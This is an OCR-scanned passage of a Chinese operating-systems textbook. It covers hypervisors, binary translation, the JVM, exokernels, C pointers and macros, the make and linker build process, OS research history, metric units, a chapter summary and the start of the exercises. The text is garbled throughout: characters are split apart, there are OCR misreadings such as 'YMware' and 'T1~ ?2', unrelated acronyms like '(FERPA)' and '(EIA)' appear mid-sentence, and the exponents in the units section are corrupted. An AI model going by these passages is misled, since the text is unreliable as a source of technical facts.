务 ， 某 个 偏好 的 应 用 程序 可 运行 在 一 个 操作 系统 上 ， 而 其 他 的 应 用 程序 可 运行 在 另 一 个 操作 系统 上 。 如 图 1- 
29a 所 示 ， 在 这 里 术语 “虚拟 机 监控 程序 ”已 经 被 重 命名 为 第 一 类 虚拟 机 管理 程序 (type | hypervisor), 
后 者 现在 更 常用 ， 因 为 输入 前 者 的 英文 “virtual machine monitor” 超 出 了 人 们 所 能 接受 的 按键 次 数 。 
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虚拟 机 的 吸引 力 是 没有 和 争议 的 ， 问 题 在 于 实现 。 为 了 在 一 台 计 算 机 上 运行 虚拟 机 软件 ， 其 CPU 必 须 
被 虚拟 化 (Popek 和 Goldberg，1974)。 简 言 之 ， 存 在 一 个 问题 。 当 运行 虚拟 机 (FERPA) 的 操作 系统 
执行 某 个 特权 指令 时 ， 比 如 修改 PSW 或 进行 IO 操作 ， 硬 件 实 际 上 陷入 到 了 虚拟 机 中 ， 这 样 有 关 指 令 就 
可 以 在 软件 中 模拟 。 在 某 些 CPU 上 (特别 是 Pentium 和 它 的 后 继 者 及 其 克隆 版 中 ) 试图 在 用 户 态 执行 特 
权 指令 时 ， 会 被 忽略 掉 。 这 种 特性 使 得 在 这 类 硬件 中 无 法 实现 虚拟 机 ， 这 也 解释 了 PC 世界 对 虚拟 机 不 感 - 
兴趣 的 原因 。 当 然 ， 对 于 Pentium 而 言 ， 还 有 解释 器 可 以 运行 在 Pentium 上 ， 例 如 Bochs 但 是 其 性 能 丧失 
T1~ ?2 数量级， 这样 对 于 要 求 高 的 工作 来 说 就 没有 意义 了 。 

由 于 20 世 纪 90 年 代 和 本 世纪 这 些 年 来 若干 学 术 研 究 小 组 的 努力 ， 特 别 是 斯 坦 福 大 学 的 Disco 
(Bugnion A, 1997) 和 剑桥 大 学 的 Xen (Barham 等 人 ，2003) 实现 了 商业 化 产品 〈 例 如 VMware 工作 
站 和 Xen) ， 使 得 人 们 对 虚拟 机 的 热情 得 以 复 燃 。 除 了 VMware 和 Xen 外 ， 现 在 流行 的 虚拟 机 管理 程序 还 
有 KVM (针对 Linux 内 核 ) 、Oracle 公 司 的 VirtualBox 以 及 微软 公司 的 Hyper-V。 

一 些 早 期 研究 项 目 通过 即时 翻译 大 块 代码 、 将 其 存储 到 内 部 高 速 缓存 并 在 其 再 次 执行 时 复 用 的 方式 ， 
”提高 了 Bochs 等 翻译 器 的 性 能 。 这 种 手段 大 幅 提 高 了 性 能 ， 也 推动 了 模拟 器 (machine simulator) 的 出 现 ， 
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如 图 1-29b 所 示 。 这 项 被 称 为 二 进 制 翻译 (binary translation) 的 技术 对 性 能 的 提升 有 所 帮助 ， 不 过 ， 
生成 的 系统 虽然 优秀 到 足以 在 学 术 会 议 上 发 表 论 文 ， 但 仍 没有 快 到 可 以 在 极其 注重 性 能 的 商业 环境 下 
使 用 。 

改善 性 能 的 下 一 步 在 于 添加 分 担 重担 的 内 核 模块 ， 如 图 1-29c 所 示 。 事 实 上 ， 现 在 所 有 商业 可 用 的 
虚拟 机 管理 程序 都 使 用 这 种 混合 策略 (并 且 也 有 很 多 其 他 改进 ) ， 如 VMware 工作 站 。 它 们 被 称 为 第 二 类 
虚拟 机 管理 程序 ， 本 书 中 我 们 也 延续 使 用 这 个 名 称 (虽然 有 些 不 太 情 愿 )， 即 使 我 们 更 愿意 用 类 型 1.7 虚 
拟 机 管理 程序 来 反映 它们 并 不 完全 是 用 户 态 程序 。 在 第 7 章 中 ， 我 们 将 详细 描述 YMware 工 作 站 的 工作 原 
理 及 其 各 部 分 的 作用 。 

实际 上 ， 第 一 类 和 第 二 类 虚拟 机 管理 程序 的 真正 区 别 在 于 ， 后 者 利用 宿主 操作 系统 (host operating 
system) 并 通过 其 文件 系统 创建 进程 、 存 储 文件 等 。 第 一 类 虚拟 机 管理 程序 没有 底层 支持 ， 所 以 必须 自 
行 实现 所 有 功能 。 

当 第 二 类 虚拟 机 管理 程序 启动 时 ， 它 从 CD-ROM 安 装 盘 中 读 入 供 选 择 的 客户 操作 系统 (guest 
operating system) ， 并 安装 在 一 个 虚拟 盘 上 ， 该 盘 实 际 上 只 是 宿主 操作 系统 的 文件 系统 中 的 一 个 大 文件 。 
由 于 没有 可 以 存储 文件 的 宿主 操作 系统 ， 因 此 第 一 类 虚拟 机 管理 程序 不 能 采用 这 种 方式 。 它 们 必须 在 原 
始 的 硬盘 分 区 上 自行 管理 存储 。 

在 客户 操作 系统 启动 时 ， 它 完成 的 工作 与 在 真实 硬件 上 相同 ， 如 启动 一 些 后 台 进程 ， 然 后 是 GUI。 
对 用 户 而 言 ， 客 户 操作 系统 与 在 裸 机 上 运行 时 表现 出 相同 的 行为 ， 虽 然 事实 并 非 如 此 。 

处 理 控制 指令 的 一 种 不 同方 式 是 ， 修 改 操作 系统 ， 删 掉 它们 。 这 种 方式 不 是 真正 的 虚拟 化 ， 而 是 半 
虚拟 化 (paravirtualization)。 我 们 将 在 第 7 章 具 体 讨论 虚拟 化 。 

3. Java 虚 拟 机 

另 一 个 使 用 虚拟 机 的 领域 ， 是 为 了 运行 Java 程 序 ， 但 方式 有 些 不 同 。 在 Sun 公司 发 明 Java 程 序 设计 语言 
时 ， 也 同时 发 明了 称 为 JVM (Java Virtual Machine) 的 虚拟 机 (一 种 体系 结构 )。Java 编译 器 为 JVM 生 成 代 
码 ， 这 些 代码 以 后 可 以 由 一 个 软件 JVM 解 释 器 执行 。 这 种 处 理 方式 的 优点 在 于 ，JVM 代 码 可 以 通过 Internet 
传送 到 任何 有 JVM 解 释 器 的 计算 机 上 ， 并 在 该 机 器 上 执行 。 举 例 来 说 ， 如 果 编 译 器 生成 了 SPARC 或 Pentium 
二 进 制 代码 ， 这 种 代码 不 可 能 轻易 地 送 到 任何 地 方 并 执行 。( 当 然 ，Sun 可 以 生产 一 种 生成 SPARC 二 进 制 代 
码 的 编译 器 ， 并 且 发 布 一 种 SPARC 解 释 器 ， 但 是 JVM 具 有 非常 简单 的 、 只 需要 解释 的 体系 结构 。) 使 用 JVM 
的 另 一 种 优点 是 ， 如 果 解 释 器 正确 地 完成 ， 并 不 意味 着 就 结束 了 ， 还 要 对 所 输入 的 JVM 进 行 安全 性 检查 ， 
然后 在 一 种 保护 环境 下 执行 ， 这 样 ， 这 些 程序 就 不 能 偷窃 数据 或 进行 其 他 任何 有 害 的 操作 。 


1.7.6 外 核 

与 虚拟 机 克隆 真实 机 器 不 同 ， 另 一 种 策略 是 对 机 器 进行 分 区 ， 换 句 话说 ， 给 每 个 用 户 整个 资源 的 一 个 
子 集 。 这 样 ， 某 个 虚拟 机 可 能 得 到 磁盘 的 0 至 1023 盘 块 ， 而 另 一 台 虚 拟 机 会 得 到 1024 至 2047 盘 块 ， 等 等 。 

在 底层 中 ， 一 种 称 为 外 核 (exokernel，Engler 等 人 ，1995) 的 程序 在 内 核 态 运行 。 它 的 任务 是 为 虚 
拟 机 分 配 资 源 ， 并 检查 使 用 这 些 资源 的 企图 ， 以 确保 没有 机 器 会 使 用 他 人 的 资源 。 每 个 用 户 层 的 虚拟 机 
可 以 运行 自己 的 操作 系统 ， 如 VM/370 和 Pentium 虚 拟 8086 等 ， 但 限制 只 能 使 用 已 经 申请 并 且 获 得 分 配 的 
那 部 分 资源 。 

外 核 机 制 的 优点 是 ， 它 减少 了 映像 层 。 在 其 他 的 设计 中 ， 每 个 虚拟 机 都 认为 它 有 自己 的 磁盘 ， 其 盘 
块 号 从 0 到 最 大 编号 ， 这 样 虚拟 机 监控 程序 必须 维护 一 张 表 格 以 重 映像 磁盘 地 址 (以 及 其 他 资源 )。 有 了 
外 核 ， 这 个 重 映 像 处 理 就 不 需要 了 。 外 核 只 需要 记录 已 经 分 配给 各 个 虚拟 机 的 有 关 资 源 即 可 。 这 个 方法 
还 有 一 个 优点 ， 它 将 多 道 程序 (EIA) 与 用 户 操 作 系 统 代 码 (在 用 户 空间 内 ) 加 以 分 离 ， 而 且 相 应 
负载 并 不 重 ， 这 是 因为 外 核 所 做 的 只 是 保持 多 个 虚拟 机 彼此 不 发 生 冲 突 。 


1.8 依靠 C 的 世界 
操作 系统 通常 是 由 许多 程序 员 写成 的 ， 包 括 很 多 部 分 的 大 型 C (有 时 是 C++) 程序 。 用 于 开发 操作 


系统 的 环境 ， 与 个 人 〈 如 学 生 ) 用 于 编写 小 型 Java 程 序 的 环境 是 非常 不 同 的 。 本 节 试 图 为 那些 有 时 编写 
Java 或 者 Python 程序 的 程序 员 简 要 地 介绍 编写 操作 系统 的 环境 。 
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1.8.1 C 语 言 

这 里 不 是 C 语 言 的 指南 ， 而 是 简要 介绍 C 与 类 Python 语 言 特别 是 Java 之 间 的 关键 差别 。Java 是 基于 C 
的 ， 所 以 两 者 之 间 有 许多 类 似 之 处 。Python 有 一 点 不 同 ， 但 仍然 十 分 相似 。 为 方便 起 见 ， 我 们 将 注意 力 
放 在 Java 上 。Java、Python 和 C 都 是 命令 式 的 语言 ， 例 如 ， 有 数据 类 型 、 变 量 和 控制 语句 等 。 在 C 中 基本 
数据 类 型 是 整数 (包括 短 整数 和 长 整数 )、 字 符 和 浮 点 数 等 。 使 用 数组 、 结 构 体 和 联合 ， 可 以 构造 组 合 
数据 类 型 。C 语 言 中 的 控制 语句 与 Java 类 似 ， 包 括 过 、switch、for 以 及 while 等 语句 。 在 这 两 个 语言 中 ， 
函数 和 参数 大 致 相同 。 

一 项 C 语 言 中 有 而 Java 和 Python 中 没有 的 特点 是 显 式 指针 (explicit pointer)。 指 针 是 一 种 指向 ( 即 
包含 对 象 的 地 址 ) 一 个 变量 或 数据 结构 的 变量 。 考 虑 下 面 的 语句 : 

char ċ1, c2, *p; 

c1='c'; 

p = &c1, 

c2 = *p; : 

这 些 语句 声明 c1 和 c2 是 字符 变量 ， 而 p 是 指向 一 个 字符 的 变量 ( 即 包含 字符 的 地 址 )。 第 一 个 赋值 语句 将 
字符 c 的 ASCII 代 码 存 到 变量 cl 中 。 第 二 个 语句 将 cl 的 地 址 赋 给 指针 变量 p。 第 三 个 语句 将 由 p 指 向 变量 的 
内 容 赋 给 变量 c22， 这 样 ， 在 这 些 语句 执行 之 后 ，c2 也 含有 c 的 ASCII 代 码 。 在 理论 上 ， 指 针 是 输入 类 型 ， 
所 以 不 能 将 浮 点 数 地 址 赋 给 一 个 字符 指针 ， 但 是 在 实践 中 ， 编 译 器 接受 这 种 赋值 ， 尽 管 有 时 给 出 一 个 警 
告 。 指 针 是 一 种 非常 强大 的 结构 ， 但 是 如 果 不 仔 细 使 用 ， 也 会 是 造成 大 量 错 误 的 一 个 原因 。 

C 语 言 中 没有 包括 内 建 字符 串 、 线程 、 包 、 类 、 对 象 、 类 型 安全 (type safety) 以 及 垃圾 回收 
(garbage collection) 等 。 最 后 一 个 是 操作 系统 的 “淋浴 器 塞 子 "。 在 C 中 分 配 的 存储 空间 或 者 是 静态 的 ， 或 
.者 是 程序 员 明 确 分 配 和 释放 的 ， 通常 使 用 malloc 以 及 free 库 函数 。 正 是 由 于 后 面 这 个 性 质 一 一 由 程序 员 控 制 
所 有 内 存 一 一 而 且 是 用 明确 的 指针 ， 使 得 C 语 言 对 编写 操作 系统 而 言 非常 有 吸引 力 。 从 一 定 程度 上 来 说 ， 
操作 系统 实际 上 是 个 实时 系统 ， 甚 至 通用 系统 也 是 实时 系统 。 当 中 断 发 生 时 ， 操 作 系统 可 能 只 有 若干 微 秒 
去 完成 特定 的 操作 ， 否 则 就 会 丢失 关键 的 信息 。 在 任意 时 刻 启动 垃圾 回收 功能 是 不 可 接受 的 。 


1.8.2 头 文 件 

一 个 操作 系统 项 目 通 常 包括 多 个 目录 ， 每 个 目录 都 含有 许多 .c 文 件 ， 这 些 文件 中 存 有 系统 某 个 部 分 
的 代码 ， 而 一 些 .h 头 文件 则 包含 供 一 个 或 多 个 代码 文件 使 用 的 声明 以 及 定义 。 头 文件 还 可 以 包括 简单 的 
宏 ， 如 

#define BUFFER_SIZE 4096 


宏 人 允许 程序 员 命 名 常数 ， 这 样 代码 中 出 现 的 BUFFER_SIZE 在 编译 时 就 被 数值 4096 所 替代 。 良 好 的 C 程 序 
设计 实践 是 命名 除了 0，1 和 一 1 之 外 的 所 有 常数 ， 有 时 其 至 也 命名 这 三 个 数 。 宏 可 以 附带 参数 ， 例 如 
#define max(a, b)(a > b ? a: b) 
这 个 宏 人 允许 程序 员 编写 
i= max(j，k+1) 
从 而 得 到 
i= (j > k+1 2j: k+1) 
将 j 与 k+1l 之 间 的 较 大 者 存储 在 ji 中。 头 文件 还 可 以 包含 条 件 编译 ， 例 如 
#ifdef X86 
intel_int_ack() ; 
#endif 
如 果 宏 x86 有 定义 ， 而 不 是 其 他 ， 则 编译 进 对 intel_int_ack 函 数 的 调用 。 为 了 分 隔 与 结构 有 关 的 代码 ， 大 
量 使 用 了 条 件 编译 ， 这 样 只 有 当 系 统 在 x86 上 编译 时 ， 一 些 特 定 的 代码 才 会 被 插入 ， 其 他 的 代码 仅 当 系 
统 在 SPARC 等 机 器 上 编译 时 才 会 插入 。 通 过 使 用 #include 指 令 ， 一 个 .c 文 件 体 可 以 含有 零 个 或 多 个 头 文件 。 


sl # 43 


18.3 大 型 编程 项 目 

为 了 构建 操作 系统 ， 每 个 .c 被 C 编 译 器 编译 成 一 个 目标 文件 。 目 标 文件 使 用 后 级 .o， 含 有 目标 机 器 
的 二 进 制 代码 。 随 后 它们 可 以 直接 在 CPU 上 运行 。 在 C 的 世界 里 ， 没 有 类 似 于 Java 字 节 代 码 的 东西 。 

C 编 译 器 的 第 一 道 称 为 C 预 处 理 器 。 在 它 读 入 每 个 .c 文 件 时 ， 每 当 遇 到 一 个 #include 指 令 ， 就 取 来 该 
名 称 的 头 文件 ， 并 加 以 处 理 、 扩 展 宏 、 处 理 条 件 编译 (以 及 其 他 事务 )， 然 后 将 结果 传递 给 编译 器 的 下 
一 道 ， 仿 佛 它们 原先 就 包含 在 该 文件 中 一 样 。 

由 于 操作 系统 非常 大 (500 万 行 代码 是 很 寻常 的 ) ， 每 当 文件 修改 后 就 重新 编译 是 无 法 忍受 的 。 另 一 
方面 ， 改 变 了 用 在 成 千 上 万 个 文件 中 的 一 个 关键 头 文件 ， 确 实 需要 重新 编译 这 些 文件 。 没 有 一 定 的 协助 ， 
要 想 记 录 哪 个 目标 文件 与 哪个 头 文件 相关 是 完全 不 可 行 的 。 

幸运 的 是 ， 计 算 机 非常 善于 处 理事 物 分 类 。 在 UNIX 系 统 中 ， 有 个 名 为 make 的 程序 (其 大 量 的 变 体 如 
gmake、pmake 等 )， 它 读 入 Makefile， 该 Makefile 说 明 哪个 文件 与 哪个 文件 相关 。make 的 作用 是 ， 在 构建 操 
作 系统 二 进 制 码 时 ， 检 查 此 刻 需 要 哪个 目标 文件 ， 而 且 对 于 每 个 文件 ， 检 查 自从 上 次 目标 文件 创建 之 后 是 
否 有 任何 它 依 赖 的 文件 (代码 和 头 文件 ) 已 经 被 修改 了 。 如 果 有 ， 目 标 文件 需要 重新 编译 。 在 make 确 定 了 
哪个 .o 文 件 需要 重新 编译 之 后 ， 它 调用 C 编 译 器 重新 编译 这 些 文件 ， 这 样 ， 就 把 编译 的 次 数 降 到 最 低 限 度 。 
在 大 型 项 目 中 ， 创 建 Makefile 是 一 件 容易 出 错 的 工作 ， 所 以 出 现 了 一 些 工 具 使 该 工作 能 够 自动 完成 。 

一 旦 所 有 的 .o 文 件 就 绪 ， 这 些 文件 被 传递 给 称 为 linker 的 程序 ， 将 其 组 合成 一 个 可 执行 的 二 进 制 文 
件 。 此 时 ， 任 何 被 调用 的 库 函 数 都 已 经 包含 在 内 ， 函 数 之 间 的 引用 都 已 经 解决 ， 而 机 器 地 址 也 都 按 需 要 
分 配 完毕 。 在 linker 完 成 之 后 ， 得 到 一 个 可 执行 程序 ， 在 UNIX 中 传统 上 称 为 a.out 文 件 。 这 个 过 程 中 的 各 
个 部 分 如 图 1-30 所 示 ， 图 中 的 程序 包含 三 个 C 文 件 和 两 个 头 文件 。 这 里 虽然 讨论 的 是 有 关 操 作 系统 的 开 
发 ， 但 是 所 有 内 容 对 开发 任何 大 型 程序 而 言 都 是 适用 的 。 





图 1-30 编译 C 和 头 文件 来 构建 可 执行 文件 的 过 程 


1.8.4 运行 模型 

在 操作 系统 二 进 制 代码 链接 完成 后 ， 计 算 机 就 可 以 重新 启动 ， 新 的 操作 系统 开始 运行 。 一 旦 运行 ， 
系统 会 动态 调 入 那些 没有 静态 包括 在 二 进 制 代码 中 的 模块 ， 如 设备 驱动 和 文件 系统 。 在 运行 过 程 中 ， 操 
作 系 统 可 能 由 若干 段 组 成 ， 有 文本 段 (程序 代码 )、 数 据 段 和 堆栈 段 。 文 本 段 通常 是 不 可 改变 的 ， 在 运 
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行 过 程 中 不 可 修改 。 数 据 段 开始 时 有 一 定 的 大 小 ， 并 用 确定 的 值 进行 初始 化 ， 但 是 随后 就 被 修改 了 ， 其 
大 小 随 需 要 增长 。 堆 栈 段 被 初始 化 为 空 ， 但 是 随 着 对 函数 的 调用 和 从 函数 返回 ， 堆 栈 段 时 时 刻 刻 在 增长 
和 缩小 。 通 常 文本 段 放置 在 接近 内 存 底部 的 位 置 ， 数 据 段 在 其 上 面 ， 这 样 可 以 向 上 增长 。 而 堆栈 段 处 于 
高 位 的 虚拟 地 址 ， 具 有 向 下 增长 的 能 力 ， 不 过 不 同系 统 的 工作 方式 各 有 差别 。 

在 所 有 情形 下 ， 操 作 系统 代码 都 是 直接 在 硬件 上 执行 的 ， 不 用 解释 器 ， 也 不 是 即时 编译 ， 如 Java 通 
常 做 的 那样 。 


1.9 有 关 操 作 系 统 的 研究 

计算 机 科学 是 快速 发 展 的 领域 ， 很 难 预测 其 下 一 步 的 发 展 方向 。 大 学 和 产业 研究 实验 室 中 的 研究 人 
员 始 终 在 思考 新 的 思想 ， 这 些 新 思想 中 的 某 些 内 容 并 没有 什么 用 处 ， 但 是 有 些 新 思想 会 成 为 未 来 产品 的 
基石 ， 并 对 产业 界 和 用 户 产生 广泛 的 影响 。 当 然 ， 事 后 解说 要 比 当时 说 明 容 易 得 多 。 将 小 麦 从 牧 子 中 分 
离 出 来 是 非常 困难 的 ， 因 为 一 种 思想 从 出 现 到 形成 影响 常常 需要 20 一 30 年 。 

例如 ， 当 艾森豪威尔 总 统 在 1958 年 建立 国防 部 高 级 研究 计划 署 (ARPA) 时 ， 他 试图 通过 五 角 大 楼 
的 研究 预算 来 削弱 海军 和 空军 并 维护 陆军 的 地 位 。 他 并 不 是 想 要 发 明 Internet。 但 是 ARPA 做 的 一 件 事 
是 给 予 一 些 大 学 资助 ， 用 以 研究 模糊 不 清 的 包 交 换 概念 ， 这 个 研究 很 快 导致 了 第 一 个 实验 性 的 包 交 换 
网 的 建立 ， 即 ARPANET。 该 网 在 1969 年 启用 。 没 有 多 久 ， 其 他 被 ARPA 资 助 的 研究 网 络 也 连接 到 
ARPANET 上 ， 于 是 Internet 诈 生 了 。Internet“ 愉 快 地 ”为 学 术 研究 人 员 互 相 发 送 了 20 年 的 电子 邮件 。 
到 了 20 世 纪 90 年 代 早 期 ，Tim Berners-Lee 在 日 内 瓦 的 CERN 研 究 所 发 明了 万 维 网 (World Wide Web), 
而 Marc Andreesen 在 伊利 诺 伊 大 学 为 万 维 网 写 了 一 个 图 形 浏览 器 。 突 然 ，Internet 上 充满 了 年 轻 人 的 聊 
天 活动 。 

对 操作 系统 的 研究 也 导致 了 实际 操作 系统 的 戏剧 性 变化 。 正 如 我 们 较 早 所 讨论 的 ， 第 一 代 商 用 计算 
机 系统 都 是 批 处 理 系统 ， 直 到 20 世 纪 60 年 代 早 期 MIT 发 明了 交互 式 分 时 系统 为 止 。20 世 纪 60 年 代 后 期 ， 
即 在 Doug Engelbart 于 斯 坦 福 研 究 院 发 明 鼠 标 和 图 形 用 户 接口 之 前 ， 所 有 的 计算 机 都 是 基于 文本 的 。 有 
谁 知 道 下 一 个 发 明 将 会 是 什么 呢 ? 

在 本 节 和 本 书 的 其 他 相关 章节 中 ， 我 们 会 简要 地 介绍 一 些 在 过 去 5~ 10 年 中 操作 系统 的 研究 工作 ， 这 
是 为 了 让 读者 了 解 可 能 会 出 现 什 么 。 这 个 介绍 当然 不 全 面 ， 而 且 主要 依据 在 高 水 平 的 期 刊 和 会 议 上 已 经 
发 表 的 文章 ， 因 为 这 些 文章 为 了 得 以 发 表 至 少 需要 经 过 严格 的 同行 评估 过 程 。 值 得 注意 的 是 ， 相 对 于 其 
他 科学 领域 ， 计 算 机 科学 中 的 大 多 数 研 究 都 是 在 会 议 而 非 期 刊 上 公布 的 。 在 有 关 研 究 内 容 一 节 中 所 引用 
的 多 数 文章 ， 发 表 在 ACM 刊 物 、IEEE 计 算 机 协会 刊物 或 者 USENIX 刊 物 上 ， 并 对 这 些 组 织 的 (学生) 成 
员 在 Internet 上 开放 。 有 关 这 些 组 织 的 更 多 信息 以 及 它们 的 数字 图 书馆 ， 可 以 访问 : 


ACM http://www.acm.org 
IEEE 计 算 机 协会 http://www.computer.org 
USENIX http://www.usenix.org 


实际 上 ， 所 有 的 操作 系统 研究 人 员 都 认识 到 ， 目 前 的 操作 系统 是 一 个 不 灵活 、 不 可 靠 、 不 安全 和 带 
有 错误 的 大 系统 ， 而 且 某 个 特定 的 操作 系统 较 其 他 的 系统 有 更 多 的 错误 (这 里 略 去 了 名 称 以 避免 责任 ) 。 
所 带 来 的 结果 是 ， 大 量 的 研究 集中 于 如 何 构造 更 好 的 操作 系统 。 近 来 出 版 的 文献 有 如 下 一 些 : 关于 错误 
和 调试 (Renzelmann 等 人 ，2012; Zhou 等 人 ，2012)， 故 障 恢复 (Correia 等 人 ，2012; Ma 等 人 ， 
2013; Ongaro A, 2011; Yeh 和 Cheng，2012)， 能 源 管理 (Pathak A, 2012; Petrucci 和 Logques， 
2012;，Shen 等 人 ，2013)， 文件 和 存储 系统 (Elnably 和 Wang，2012;，Nightingale 等 人 ，2012，Zhang 等 
人 ，2013a) ， 高 性 能 IO (De Bruijn 等 人 ，2011; Li 等 人 ，2013a; Rizzo，2012)， 超 线程 与 多 线程 (Liu 
等 人 ，2011)， 在 线 更 新 (Giuffrida 等 人 ，2013)， 管 理 GPU (Rossbach 等 人 ，2011) ， 内 存 管理 (Jantz 等 
人 ，2013; Jeong 等 人 ，2013)， 多 核 操 作 系 统 (Baumann 等 人 ，2009，Kapritsos，2012，Lachaize 等 人 ， 
2012，Wentzlaff 等 人 ，2012)， 操 作 系 统 正确 性 (Elphinstone 等 人 ，2007，Yang 等 人 ，2006; Klein 等 人 ， 
2009)， 操 作 系 统 可 靠 性 (Hruby 等 人 ，2012; Ryzhyk 等 人 ，2009，2011; Zheng 等 人 ，2012)， 隐 私 与 
安全 (Dunn 等 人 ，2012，Giuffrida 等 人 ，2012，Li 等 人 ，2013b，Lorch 等 人 ，2013，Ortolani 和 Crispo， 
2012; Slowinska 等 人 ，2012;，dranath 等 人 ，2012) ， 虚 拟 化 (Agesen 等 人 ，2012; Ben-Yehuda 等 人 ， 
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2010; Colp A, 2011; Dai A, 2013; Tarasov A, 2013; Williams“ A, 2012), 


1.10 本 书 其 他 部 分 概要 


我 们 已 经 叙述 完毕 引 论 ， 并 且 描 绘 了 操作 系统 的 图 景 。 现 在 是 进入 具体 细节 的 时 候 了 。 正 如 前 面 已 
经 叙述 的 ， 从 程序 员 的 观点 来 看 ， 操 作 系 统 的 基本 目的 是 提供 一 些 关键 的 抽象 ， 其 中 最 重要 的 是 进程 和 
线程 、 地 址 空间 以 及 文件 。 所 以 后 面 三 章 都 是 有 关 这 些 关 键 主题 的 。 “ 

第 2 章 讨 论 进程 与 线程 ， 包 括 它 们 的 性 质 以 及 它们 之 间 如 何 通 信 。 这 一 章 还 给 出 了 大 量 关 于 进程 间 
如 何 通信 的 例子 以 及 如 何 避 免 某 些 错误 。 

第 3 章 具 体 讨 论 地 址 空间 以 及 内 存 管 理 ， 讨 论 虚 拟 内 存 等 重要 课题 ， 以 及 相关 的 概念 ， 如 页 处 理 和 
分 段 等 。 

第 4 章 里 ， 我 们 会 讨论 有 关 文 件 系 统 的 所 有 重要 内 容 。 在 某 种 程度 上 ， 用 户 看 到 的 是 大 量 文件 系统 。 
我 们 将 研究 文件 系统 接口 和 文件 系统 的 实现 。 

输入 /输出 是 第 5 章 的 内 容 。 这 一 章 介 绍 设备 独立 性 和 设备 依赖 性 的 概念 ， 将 以 若干 重要 的 设备 ( 包 
括 磁盘 、 键 盘 以 及 显示 设备 ) 为 例 进 行 讲解 。 

第 6 章 讨论 死 锁 。 在 这 一 章 中 我 们 概要 地 说 明 什 么 是 死 锁 ， 还 讨论 避免 死 锁 的 方法 。 

到 此 ， 我 们 完成 了 对 单 CPU 操 作 系 统 基 本 原理 的 学 习 。 不 过 ， 还 有 更 多 的 高 级 内 容 要 叙述 。 在 第 7 
章 里 ， 我 们 将 考察 虚拟 化 ， 其 中 既 会 讨论 原则 ， 又 将 详细 讨论 一 些 现存 的 虚拟 化 方案 。 另 一 个 高 级 课题 
是 多 处 理 机 系统 ， 包 括 多 处 理 器 、 并 行 计算 机 以 及 分 布 式 系统 。 这 些 内 容 放 在 第 8 章 中 讨论 。 

有 一 个 非常 重要 的 主题 就 是 操作 系统 安全 ， 它 是 第 9 章 的 内 容 。 在 这 一 章 中 讨论 的 内 容 涉及 威胁 
(例如 ， 病 毒 和 蠕虫 )、 保 护 机 制 以 及 安全 模型 。 

随后 ， 我 们 安排 了 一 些 实际 操作 系统 的 案例 。 它 们 是 : UNIX、Linux 和 Android (第 10 章 ) ， 
Windows 8 (第 11 章 )。 本 书 以 第 12 章 关于 操作 系统 设计 的 一 些 思考 作为 结束 。 


1.11 公制 单位 

为 了 避免 混乱 ， 有 必要 在 本 书 中 特别 指出 ， 考 虑 到 计算 机 科学 的 通用 性 ， 所 以 我 们 采用 公制 来 代替 
传统 的 英制 。 在 图 1-31 中 列 出 了 主要 的 公制 前 级 。 前 缀 是 英文 单词 前 面 字母 的 缩写 ， 凡 是 单位 大 于 1 的 
首 字 母 均 大 写 。 这 样 ， 一 个 1TB 的 数据 库 占据 了 10" 字 节 的 存储 空间 ， 而 100 psec (或 100ps) 的 时 钟 每 
隔 10-"s 的 时 间 滴 答 一 次 。 由 于 milli 和 micro 均 以 字母 “m” 开 头 ， 所 以 必须 对 两 者 做 出 区 分 。 通 常 ， 用 
“m” amili, mA “u” (AFE) 表示 micro。 


















































图 1-31 主要 的 公制 前 绥 


这 里 需要 说 明 的 还 有 关于 存储 器 容量 的 度量 ， 在 工业 实践 中 ， 各 个 单位 的 含义 稍 有 不 同 。 这 里 Kilo 
表示 2 (1024) 而 不 是 10， (1000)， 因 为 存储 器 大 小 总 是 2 的 睹 。 这 样 1KB 存 储 器 就 有 1024 个 字 节 ， 而 
不 是 1000 个 字 节 。 类 似 地 ，1MB 存 储 器 有 22 (1 048 576) 个 字 节 ，1GB 存 储 器 有 2” (1 073 741 824) 
Sd 但 是 ，1Kb/s 的 通信 线路 每 秒 传送 1000 个 位 ， 而 10Mb/s 的 局 域 网 在 10 000 000 位 / 秒 的 速率 上 运 

， 因 为 这 里 的 速率 不 是 2 的 寡 。 很 不 幸 ， 许 多 人 倾向 于 将 这 两 个 系统 混 请 ， 
MRE, 在 本 书 中 ， 为 了 避免 含糊 ， 我 们 使 用 人 KB、MB 和 GB 分 别 表 示 2" 字 节 、22 字 节 和 2? 字 节 ， 而 用 
符号 Kb/s、Mb/s 和 Gb/s 分 别 表示 103b/s、10sb/s 和 10?b/s。 
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1.12 小 结 


多 7 人 


考察 操作 系统 有 两 种 观点 : 资源 管理 观点 和 扩展 的 机 器 观点 。 在 资源 管理 观点 中 ， 操 作 系统 的 任务 
是 有 效 地 管理 系统 的 各 个 部 分 。 在 扩展 的 机 器 观点 中 ， 系 统 的 任务 是 为 用 户 提供 比 实际 机 器 更 便于 运用 


的 抽象 。 这 些 抽象 包括 进程 、 地 址 空间 以 及 文件 。 


操作 系统 的 历史 很 长 ， 从 操作 系统 开始 替代 操作 人 员 的 那天 开始 到 现代 多 道 程序 系统 ， 主 要 包括 早 


期 批 处 理 系统 、 多 道 程序 系统 以 及 个 人 计算 机 系统 。 


由 于 操作 系统 同 硬件 的 交互 密切 ， 掌 担 一 些 硬 件 知 识 对 于 理解 它们 是 有 益 的 。 计 算 机 由 处 理 器 、 存 


储 器 以 及 IO 设备 组 成 。 这 些 部 件 通过 总 线 连 接 。 


所 有 操作 系统 构建 所 依赖 的 基本 概念 是 进程 、 存 储 管理 、1/O 管 理 、 文 件 管理 和 安全 。 这 些 内 容 都 


将 在 后 续 用 一 章 来 讲述 。 


任何 操作 系统 的 核心 是 它 可 处 理 的 系统 调用 集 。 这 些 系统 调用 真实 地 说 明了 操作 系统 所 做 的 工作 。 
对 于 UNIX， 我 们 已 经 考察 了 四 组 系统 调用 。 第 一 组 系统 调用 同 进程 的 创建 和 终止 有 关 ， 第 二 组 用 于 读 
写 文件 ， 第 三 组 用 于 目录 管理 ， 第 四 组 包括 各 种 杂项 调用 。 

操作 系统 构建 方式 有 多 种 。 最 常见 的 有 单 体系 统 、 层 次 化 系统 、 微 内 核 系统 、 客 户 端 -服务 器 系统 、 


虚拟 机 系统 和 外 核 系 统 。 
习题 


1. 操作 系统 的 两 大 主要 作用 是 什么 ? 

2. 在 1.4 节 中 描述 了 9 种 不 同类 型 的 操作 系统 ， 列 
举 每 种 操作 系统 的 应 用 (每 种 系统 一 种 应 用 )。 

3. 分 时 系统 和 多 道 程序 系统 的 区 别 是 什么 ? 

4. 为 了 使 用 高 速 缓存 , 主 存 被 划分 为 若干 cache 行 ， 

